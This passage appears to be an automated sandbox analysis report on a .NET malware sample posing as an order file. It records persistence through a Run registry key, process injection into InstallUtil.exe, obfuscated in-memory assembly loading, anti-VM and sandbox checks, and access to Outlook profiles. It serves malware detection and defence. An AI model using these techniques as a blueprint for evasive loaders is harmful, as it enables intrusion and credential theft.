                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: GEFA-Order 232343-68983689.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: GEFA-Order 232343-68983689.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000043AA000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.0000000004201000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.00000000033BB000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1410426662.0000000006F50000.00000004.08000000.00040000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1585499252.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1566745789.000000000306C000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1677808724.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1653047795.000000000313D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: GEFA-Order 232343-68983689.exe, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000043AA000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.0000000004201000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.00000000033BB000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1410426662.0000000006F50000.00000004.08000000.00040000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1585499252.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1566745789.000000000306C000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1677808724.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1653047795.000000000313D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1409541914.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1409541914.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, JxjTJsLcVMlWTHfxdv2.cs .Net Code: Type.GetTypeFromHandle(LRRHRdFacvx8pdkSBQ9.K9nM54wEA2(16777265)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(LRRHRdFacvx8pdkSBQ9.K9nM54wEA2(16777259)),Type.GetTypeFromHandle(LRRHRdFacvx8pdkSBQ9.K9nM54wEA2(16777263))})
                    Source: GEFA-Order 232343-68983689.exe, -.cs .Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                    Source: GEFA-Order 232343-68983689.exe, Wgiucr.cs .Net Code: _E003 System.AppDomain.Load(byte[])
                    Source: Fqhnalw.exe.0.dr, -.cs .Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                    Source: Fqhnalw.exe.0.dr, Wgiucr.cs .Net Code: _E003 System.AppDomain.Load(byte[])
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6d80000.10.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6d80000.10.raw.unpack, ListDecorator.cs .Net Code: Read
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6d80000.10.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6d80000.10.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6d80000.10.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
                    Source: 0.2.GEFA-Order 232343-68983689.exe.435a4d8.4.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
                    Source: 0.2.GEFA-Order 232343-68983689.exe.435a4d8.4.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
                    Source: 0.2.GEFA-Order 232343-68983689.exe.435a4d8.4.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
                    Source: 0.2.GEFA-Order 232343-68983689.exe.45a8650.6.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
                    Source: 0.2.GEFA-Order 232343-68983689.exe.45a8650.6.raw.unpack, ListDecorator.cs .Net Code: Read
                    Source: 0.2.GEFA-Order 232343-68983689.exe.45a8650.6.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
                    Source: 0.2.GEFA-Order 232343-68983689.exe.45a8650.6.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
                    Source: 0.2.GEFA-Order 232343-68983689.exe.45a8650.6.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
                    Source: Yara match File source: 0.2.GEFA-Order 232343-68983689.exe.6ea0000.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000006.00000002.1653047795.0000000003042000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1410088723.0000000006EA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000004.00000002.1566745789.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1389741733.0000000003252000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: GEFA-Order 232343-68983689.exe PID: 7416, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: Fqhnalw.exe PID: 7784, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: Fqhnalw.exe PID: 7972, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Code function: 0_2_030B4D1B push E4057763h; ret 0_2_030B4D25
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Code function: 0_2_06D62EA7 push esp; retf 0_2_06D62EA8
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Code function: 0_2_06DD3228 push es; ret 0_2_06DD3244
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Code function: 0_2_06F13D98 push es; iretd 0_2_06F13DF8
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Code function: 0_2_06F1C328 push es; ret 0_2_06F1C340
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Code function: 0_2_06F235F3 push edi; retf 0_2_06F235F6
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Code function: 0_2_06F259F9 push es; retf 0_2_06F25A14
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Code function: 0_2_06F259C1 push es; retf 0_2_06F259C4
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Code function: 0_2_06F37791 push es; ret 0_2_06F37760
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Code function: 0_2_06F37750 push es; ret 0_2_06F37760
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Code function: 0_2_06FF6EAB push ecx; ret 0_2_06FF6EAC
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Code function: 0_2_06FF75A3 push es; retf 0_2_06FF75A4
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Code function: 0_2_06FF8137 push es; retf 0_2_06FF8144
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Code function: 0_2_06FF8120 push es; retf 0_2_06FF8134
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_05B32AA8 push ebp; ret 2_2_05B32B15
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe Code function: 4_2_01314D1B push E4053963h; ret 4_2_01314D25
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe Code function: 4_2_06972EA7 push esp; retf 4_2_06972EA8
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe Code function: 4_2_069E3228 push es; ret 4_2_069E3244
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe Code function: 4_2_06B335F3 push edi; retf 4_2_06B335F6
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe Code function: 4_2_06B359FA push es; retf 4_2_06B35A14
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe Code function: 4_2_06B47750 push es; ret 4_2_06B47760
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe Code function: 4_2_06C071AF push es; ret 4_2_06C071B0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe Code function: 6_2_06A12EA7 push esp; retf 6_2_06A12EA8
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe Code function: 6_2_06A83228 push es; ret 6_2_06A83244
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe Code function: 6_2_06BCC33A push es; ret 6_2_06BCC340
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe Code function: 6_2_06BD35F3 push edi; retf 6_2_06BD35F6
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe Code function: 6_2_06BD5C8D push es; iretd 6_2_06BD5C9C
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe Code function: 6_2_06BD59BD push es; retf 6_2_06BD59C4
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe Code function: 6_2_06BD59EE push es; retf 6_2_06BD5A14
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe Code function: 6_2_06CA71AF push es; ret 6_2_06CA71B0
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6c10000.9.raw.unpack, x8qeriHsBiUsCQ7g3Bh.cs High entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'WknHoSKiuK', 'NtProtectVirtualMemory', 'um9CMOjkTJBulBtD1M6', 'AgV0kbjc7MCu5ZFEpup', 'ktjuabjyTc4tQaY8LFM', 'IiROs2jP1JToUIORgjU'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, AssemblyLoader.cs High entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'hZwBFkEZPJ9N4PRApwN'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, x8qeriHsBiUsCQ7g3Bh.cs High entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'WknHoSKiuK', 'NtProtectVirtualMemory', 'um9CMOjkTJBulBtD1M6', 'AgV0kbjc7MCu5ZFEpup', 'ktjuabjyTc4tQaY8LFM', 'IiROs2jP1JToUIORgjU'
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe File created: C:\Users\user\AppData\Roaming\Fqhnalw.exe
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Fqhnalw
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match File source: Process Memory Space: GEFA-Order 232343-68983689.exe PID: 7416, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: Fqhnalw.exe PID: 7784, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: Fqhnalw.exe PID: 7972, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.0000000003252000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1566745789.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1653047795.0000000003042000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory allocated: 30B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory allocated: 3200000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory allocated: 5200000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 12D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2DB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4DB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory allocated: 1310000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory allocated: 2EB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory allocated: 2CD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 15F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 33B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 31B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory allocated: 15C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory allocated: 2FF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory allocated: 2DF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 14C0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 31B0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 51B0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: Fqhnalw.exe, 00000006.00000002.1653047795.0000000003042000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: InstallUtil.exe, 00000002.00000002.1576744494.0000000005963000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.1669394539.0000000006590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
                    Source: Fqhnalw.exe, 00000006.00000002.1653047795.0000000003042000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1388363679.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1561377900.0000000001362000.00000004.00000020.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1646663653.0000000001256000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2595206686.0000000006470000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
